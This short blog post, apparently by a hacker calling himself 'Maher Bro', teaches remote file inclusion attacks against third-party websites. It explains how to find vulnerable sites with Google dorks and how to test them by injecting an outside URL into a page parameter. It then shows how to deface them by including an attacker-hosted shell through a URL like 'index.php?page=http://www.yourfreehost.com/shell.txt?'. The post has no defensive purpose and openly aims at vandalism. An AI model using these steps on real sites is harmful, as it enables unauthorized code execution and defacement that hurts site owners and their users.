RFI [Remote File Inclusion]
Hello Friends This is Maher Bro again,
today I'm going to show you how RFI process goes Step By Step :)
#Searching for Vuln. Sites
#Checking if they are Vuln.
#Defacing them :P
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#]Searching for Vuln. sites:
We can find Vuln.websites by using Google DorkS
which can be found here RFI DorkS
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#]Checking if they are Vuln. :
Now after we searched for sites on google, many sites will show but not all of them are Vuln.
so how can we check? :P
after opening the site check the link, for example it will be like:
www.tagert.com/index.php?page=ANYTHING
now to check the site we should replace "ANYTHING" with "http://www.google.com" :)
so it will be like :
www.tagert.com/index.php?page=http://www.google.com
IF google home page showed up then the website is Vuln. for RFI,
IF not then fine another one :P
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#]Defacing:
OK, now if we found a Vuln. website how to deface? o_O
well now open any website on any free host and upload your shell in .txt
and replace http://www.google.com to your shell link so for EXAPMLE it will be:
http://www.yourfreehost.com/shell.txt
www.tagert.com/index.php?page=http://www.yourfreehost.com/shell.txt?
[!]NOTE:- DO NOT FORGET THE '?' in the end of the URL :P :D
Now your shell will show so Deface the site :P
0 comments:
Post a Comment